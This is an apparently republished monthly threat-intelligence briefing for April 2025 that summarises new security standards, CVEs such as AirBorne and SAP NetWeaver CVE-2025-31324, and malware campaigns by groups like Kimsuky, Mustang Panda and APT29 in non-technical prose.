Monthly Threat Briefing
Diamond Trail

Cyware Monthly Threat Intelligence, April 2025

Migrated from 2VEtRc4YZxotxySsZ5Vyq7

The Good

Cyber defenders are flexing their innovation muscles this season. ETSI unveiled ETSI TS 104 223, the world’s first comprehensive technical specification for AI security, outlining 13 core and 72 trackable principles across the AI lifecycle, addressing threats like data poisoning and model obfuscation. MITRE released ATT&CK v17, expanding its threat intelligence framework with ESXi platform coverage, new analytics, mobile attack techniques, and enriched mitigation strategies. Meanwhile, CISA extended funding to MITRE to sustain the Common Vulnerabilities and Exposures (CVE)  program until 2026, safeguarding vulnerability coordination. In the U.K., the government rolled out a Cyber Governance Code of Practice to help organizational leaders strengthen cyber resilience, complemented by a modular training package.

  • ETSI has released new technical specifications, ETSI TS 104 223, to establish a global benchmark for securing AI models and systems. The specifications include 13 core principles and 72 trackable principles across five lifecycle phases: secure design, development, deployment, maintenance, and end of life. These standards address unique AI challenges such as data poisoning and model obfuscation. ETSI's initiative is seen as a global first in setting a baseline for AI security, developed with input from international bodies, including significant contributions from the UK's Department for Science, Innovation and Technology and the National Cyber Security Centre.

  • MITRE introduced ATT&CK v17, enhancing its cybersecurity framework to address evolving threats. Key updates include the addition of the ESXi platform to the Enterprise matrix, reflecting increased attacks on virtualization infrastructure. Defensive improvements feature over 140 new analytics, optimized data collection with platform-specific guidance, and enriched mitigation strategies. Mobile updates encompass new techniques and tools, such as SIM Card Swap and virtualization-based malware. The CTI section now tracks additional groups and campaigns, highlighting state-sponsored and criminal operations. 

  • The DOJ launched the Data Security Program to prevent foreign adversaries, particularly designated "countries of concern" like China and Russia, from commercially purchasing sensitive U.S. data. The program prohibits unauthorized transactions, such as data brokerage, involving bulk personal (genomic, biometric, health, financial) and government-related data transfers to these nations. This initiative aims to counter espionage, surveillance, and data misuse by adversaries. 

  • To enhance digital security, the CA/Browser Forum has voted to drastically shorten SSL/TLS certificate lifespans. Currently valid for up to 398 days, the maximum validity will drop incrementally: to 200 days by March 2026, 100 days by 2027, and finally 47 days by March 2029. This reduces the time attackers can exploit compromised certificates and encourages certificate management automation and crypto-agility, aiding quantum-readiness. 

  • The CISA has extended funding to MITRE to ensure continuity of the Common Vulnerabilities and Exposures (CVE) program, avoiding a potential lapse in critical services. CISA announced the 11-month extension on April 16, utilizing an existing option period in the $57.8 million contract and ensuring the CVE program's continuity until at least March 16, 2026.

  • Prodaft has launched a unique initiative called SYS, offering to purchase user accounts on five prominent cybercrime-focused dark web forums: XSS, Exploit in, RAMP4U, Verified, and Breachforums. The program encourages users looking to leave cybercrime to sell their accounts. While Prodaft guarantees seller anonymity, it states that the purchased accounts will be reported to its law enforcement partners for transparency. 

  • The U.K government launched a new Cyber Governance Code of Practice to enhance cyber-resilience in medium and large organizations. This initiative, developed by experts from the NCSC, Department for Science, Innovation and Technology, and other professional bodies, provides guidance for board members and directors to effectively manage cyber risk. The code includes a set of actions, a training package, and a toolkit for boards. The training package is divided into five modules based on the pillars of the code: risk management, strategy, people, incident planning, response and recovery, and assurance and oversight. 

  • The British Business Bank committed nearly £37.5 million of a £50 million ($64 million) fund to support early-stage cybersecurity startups in the U.K. Osney Capital's Fund 1 plans to invest between £250,000 and £2.5 million in 30 portfolio companies at pre-seed and seed stage, with plans for follow-on Series A rounds. The British Business Bank's contribution to the Osney Capital fund reflects the growing strategic importance of cybersecurity to the government. 

The Bad

Cybercriminals have been busy, and unfortunately, so have their exploits.  Critical zero-click vulnerabilities in Apple’s AirPlay protocol, dubbed AirBorne (CVE-2025-24252, CVE-2025-24132), could allow remote code execution on billions of devices, while a flaw in Avast Free Antivirus (CVE-2025-3500) enables local privilege escalation to kernel level. Meanwhile, a campaign linked to SocGholish malware and RansomHub ransomware affiliates begins with fake Microsoft Edge updates and deploys a Python backdoor for remote access and lateral movement. Another campaign by Slow Pisces targets cryptocurrency developers with macOS malware disguised as job challenges, delivered via LinkedIn. In the supply chain domain, a malicious Python package named disgrasya on PyPI was found automating carding attacks against WooCommerce stores and downloaded over 34,000 times before detection.

  • Oligo Security identified critical vulnerabilities in Apple's AirPlay Protocol, termed "AirBorne," enabling zero-click RCE and other attacks. Key vulnerabilities include CVE-2025-24252 (use-after-free) and CVE-2025-24132 (buffer overflow), allowing attackers to exploit devices without user interaction. These vulnerabilities affect billions of devices, including Macs and third-party products using the AirPlay SDK. Apple has released patches, and users are urged to update their devices and adjust AirPlay settings to mitigate risks. 

  • A critical vulnerability in Avast Free Antivirus, identified as CVE-2025-3500, allows attackers to escalate privileges and execute code with kernel-level access. This flaw, caused by improper data validation in the aswbidsdriver kernel driver, has a CVSS score of 8.8. Although local access is required to exploit it, the vulnerability poses a significant risk due to the potential for complete system control. Avast has released a patch in version 25.3.9983.922, urging users to update immediately. The issue affects versions from 20.1.2397 to 2016.11.1.2262. 

  • Wordfence spotted WP-antymalwary-bot.php, a malware disguised as a WordPress plugin. The malware uses a backdoor function for admin login and registers a REST API route without permission checks. It enables unauthorized access, remote code execution, and script injection. The malware hides from the dashboard and can reinfect sites via a modified `wp-cron.php` file. It communicates with a C2 server, sending site URLs for tracking. It injects malicious JavaScript ads using obfuscated methods and evolves rapidly with enhanced mechanisms.

  • Hannibal Stealer is a sophisticated rebranded malware variant of the Sharp and TX stealers, targeting sensitive data from Chromium- and Gecko-based browsers, cryptocurrency wallets, and FTP clients. It employs geofencing to evade detection and compromises VPN credentials, Steam sessions, and Discord tokens. Advertised on dark web forums with a subscription model, it features a Django-based control panel for managing stolen data. The malware's source code shows minimal innovation, with changes mainly in log delivery mechanisms.

  • A sophisticated cyberattack campaign has been identified by eSentire, linking SocGholish malware to RansomHub ransomware affiliates. The attack starts when victims download a fake Microsoft Edge update from a compromised WordPress site, leading to the deployment of a Python backdoor. This malware collects system information to identify high-value targets and employs multiple encryption layers for concealment. It enables remote command execution and lateral movement within networks.

  • The Kimsuky group is distributing PebbleDash malware, previously associated with the Lazarus group, using spear-phishing tactics. The initial access involves executing JavaScript via LNK files, which then runs PowerShell for persistence and malware installation. The attackers use tools like AsyncRAT alongside PebbleDash for remote control. The modification of termsrv.dll disables RDP authentication, allowing unauthorized access. Users are advised to verify file extensions, check for modified DLLs using hash comparisons, and monitor for suspicious accounts like ‘Root’. 

  • In a recent campaign, the Chinese APT Mustang Panda deployed an updated ToneShell backdoor, enhancing its payload execution capabilities and using a modified FakeTLS protocol for C&C communication to evade detection. Newly observed tools include StarProxy, designed for lateral movement by proxying traffic over FakeTLS; two keyloggers, Paklog (logs keystrokes/clipboard locally) and Corklog (encrypts data, sets persistence); and the SplatCloakdriver. Delivered via SplatDropper, SplatCloak specifically identifies and disables Windows Defender and Kaspersky defenses. 

  • The North Korean hacking group, Slow Pisces, has been linked to a malicious campaign targeting cryptocurrency developers. The group engages with developers on LinkedIn, posing as potential employers and sending malware disguised as coding challenges. This malware, named RN Loader and RN Stealer, infects the developers' systems. The multi-stage attack chain involves sending a malicious payload only to validated targets, likely based on IP address, geolocation, time, and HTTP request headers. This information stealer harvests sensitive information from infected Apple macOS systems.

  • Cofense analyzed a sophisticated phishing campaign titled "Pick Your Poison." The attack begins with an email that appears to be from a legitimate file-sharing service, files[.]fm, warning the recipient of an impending file deletion. Upon clicking the embedded link, users are redirected to a legitimate files[.]fm page, enhancing the illusion of safety. However, when users open the shared file, they are presented with two options, "Preview" or "Download," both leading to malicious outcomes. The malware often installs a RAT such as ConnectWise RAT, allowing threat actors unauthorized access to compromised systems. 

  • Cybercriminals are targeting Intuit QuickBooks users by purchasing prominent Google Ads that lead to fake login pages, aiming to steal sensitive information like usernames, passwords, and one-time passcodes. The phishing pages closely resemble the genuine QuickBooks site, making it difficult for users to distinguish between the two. Users are advised to access their QuickBooks account directly through the official Intuit website or application, and to be vigilant about verifying the URL. 

  • The NCSC and international cybersecurity agencies have discovered that hackers are using two types of spyware, MOONSHINE and BADBAZAAR, to spy on Uyghur, Tibetan, and Taiwanese individuals and civil society organizations. The spyware-infected apps target individuals and groups perceived as a threat to China's stability, including those associated with Taiwan's independence, Tibetan rights, Uyghur Muslims, ethnic minorities in Xinjiang, democracy advocates, and Falun Gong members. Some apps mimic popular platforms like WhatsApp and Skype, while others are standalone apps designed to attract potential victims. The Tibet One and Audio Quran apps, which have been used to spread the spyware, have been removed from app stores. 

  • Socket spotted a malicious Python package named "disgrasya" on PyPI. This package contains an automated carding script targeting WooCommerce stores using CyberSource as their payment gateway. Unlike typical supply chain attacks, disgrasya made no attempt to appear legitimate. The script simulates real transactions to test stolen credit card numbers, making it hard to detect. It has been downloaded over 34,000 times. 

New Threats

Several emerging cyber threats have recently come to light, highlighting growing risks across global sectors. Earth Kasha, linked to China’s APT10, launched a spear-phishing campaign in Taiwan and Japan using a malicious Excel file, ROAMINGMOUSE, to deploy the ANEL and NOOPDOOR backdoors for espionage. Unit 42 exposed Gremlin Stealer, a C#-based malware that harvests sensitive data like credentials and crypto wallets, while Proofpoint flagged TA2900, a French-speaking BEC actor targeting rental payments using socially engineered emails and possibly generative AI. Sysdig identified UNC5174, a Chinese group, using SNOWLIGHT malware and VShell RAT in fileless Linux attacks. Meanwhile, ToddyCat exploited a flaw in ESET software to deliver TCESB malware using DLL hijacking and BYOVD techniques. 

  • Earth Kasha, an APT group believed to be part of APT10, has launched a new spear-phishing campaign targeting Taiwan and Japan in March. The campaign aims to deliver a new version of the ANEL backdoor for espionage, potentially leading to information theft and compromising sensitive data. The campaign uses a malicious Excel file, ROAMINGMOUSE, to drop ANEL components, and employs SharpHide for persistence. The second-stage backdoor, NOOPDOOR, utilizes DNS over HTTPS for secure IP resolution.

  • Unit 42 has identified Gremlin Stealer, a new info-stealer written in C# and advertised on Telegram since March. It targets sensitive data, including browser cookies, credit card information, cryptocurrency wallets, and credentials from FTP and VPN services. The malware bypasses Chrome's cookie protection and uploads stolen data to a server at 207.244.199[.]46. Gremlin Stealer is actively developed and capable of exfiltrating data from various applications, including Telegram and Discord.

  • Proofpoint has identified a new BEC threat actor, TA2900, targeting rental payments in France and occasionally Canada. This actor sends fraudulent French language emails claiming unpaid rent and instructs recipients to send payments to new bank accounts, often changing IBAN details frequently. The campaigns use compromised educational institution mailboxes and social engineering tactics to elicit emotional responses from victims. Researchers suspect the use of generative AI in crafting the emails, although this is unconfirmed. The threat actor's objective is financial theft, using opportunistically compromised accounts globally. 

  • A newly disclosed vulnerability in the Linux kernel, CVE-2025-21756, known as Attack of the Vsock, allows privilege escalation to root, threatening millions of systems. The flaw is within VMware vsock driver due to errors in reference counting during vsock transport reassignment. This leads to a use-after-free vulnerability, enabling attackers to execute arbitrary code with kernel privileges. A proof-of-concept exploit demonstrates how attackers can trigger the vulnerability, reclaim freed memory, leak kernel addresses, and hijack control flow to gain root access. 

  • A critical zero-day vulnerability, CVE-2025-31324, in SAP NetWeaver Visual Composer MetadataUploader has been actively exploited to deploy webshells and C2 frameworks, compromising enterprise and government systems. The vulnerability allows unauthenticated attackers to gain full control over affected systems by uploading and executing malicious binaries. Despite having the latest service packs, many systems were breached, with attackers bypassing protections to exploit the /developmentserver/metadatauploader endpoint. This has led to unauthorized file uploads and remote code execution. Techniques like Brute Ratel and Heaven’s Gate were used to maintain persistence and evade detection. 

  • A new Android spyware, Android.Spy.1292.origin, has been discovered in a fake Alpine Quest app, targeting Russian military personnel. The spyware, hidden in a trojanized version of the app, steals contacts, geolocation, and file information and can download additional modules to exfiltrate stored data. Distributed via Russian Android catalogs and a fake Telegram channel, the spyware sends data to a command-and-control server and shares geolocation updates with attackers' Telegram bots. The modular design allows it to perform a broader range of malicious activities. 

  • Sysdig uncovered a new campaign by Chinese state-linked group UNC5174, active since late 2024. The group used a malicious bash script to deliver the SNOWLIGHT malware and fileless VShell RAT via domain-squatting-based infrastructure. UNC5174 targeted Linux systems, using WebSockets for stealthy C2. Their techniques, victims, and infrastructure pointed to espionage and access brokering, with operations traced back to November 2024.

  • Check Point Research uncovered a phishing campaign by Russian APT29, targeting European diplomatic entities using fake wine-tasting event invites. The attackers impersonated a European foreign ministry and used a new loader, GRAPELOADER, to deploy a variant of their WINELOADER backdoor. GRAPELOADER handled fingerprinting, persistence, and payload delivery, while the updated WINELOADER acted as a modular backdoor. Both shared stealth techniques and obfuscation methods. 

  • A Chinese-linked threat group, ToddyCat, has been exploiting a security vulnerability in ESET's software to deliver a new malware, TCESB, in Asia. The malware uses DLL Search Order Hijacking to gain control of the execution flow, exploiting a flaw in ESET Command Line Scanner, which insecurely loads a DLL named "version.dll." TCESB is a modified version of an open-source tool, EDRSandBlast, and uses the BYOVD technique to install a vulnerable Dell driver, DBUtilDrv2.sys, susceptible to a privilege escalation flaw tracked as CVE-2021-36276. 

  • A latest version of Neptune RAT has been discovered, which uses advanced anti-analysis techniques and persistence methods to maintain its presence on the victim’s system. It comes packed with malicious features, including a crypto clipper, password stealer that exfiltrate credentials from 270+ unique apps, ransomware capabilities, and live desktop monitoring. Neptune RAT uses a technique involving PowerShell commands, irm (Invoke-RestMethod) and iex (Invoke-Expression), to download and execute a batch script and malware payload, establishing a connection between the client and the attacker’s server. The malware has been proliferating across GitHub, Telegram, and YouTube and targeting Windows users.

  • A new, sophisticated phishing campaign misuses Cloudflare services and Telegram for malicious purposes. The attacks use Cloudflare-branded phishing pages and advanced tactics to evade detection. The phishing pages, hosted on Cloudflare’s Pages[.]dev and Workers[.]dev platforms, impersonate DMCA takedown notices and trick victims into downloading malicious files disguised as PDFs. The attackers exploit the "search-ms" protocol to initiate a malware infection chain. The malware establishes persistence and communicates with Pyramid C2 servers. A significant evolution in this campaign is the integration of Telegram for victim tracking. 

  • The Gootloader malware has re-emerged with a new campaign that combines traditional social engineering tactics with modern ad-based delivery methods. The operators are now using Google Ads to target individuals searching for legal document templates. The attack chain begins with a Google search, where a sponsored ad from a seemingly legitimate legal document provider, lawliner[.]com, appears among the top results. Upon clicking, users are prompted to enter their email address to access the document. They then receive an email containing a link to download a ZIP archive with a JavaScript file. When executed, this file performs classic Gootloader behavior, creating a scheduled task, dropping another .js file, and launching PowerShell scripts that attempt to reach out to a series of compromised WordPress blogs.

Discover Related Resources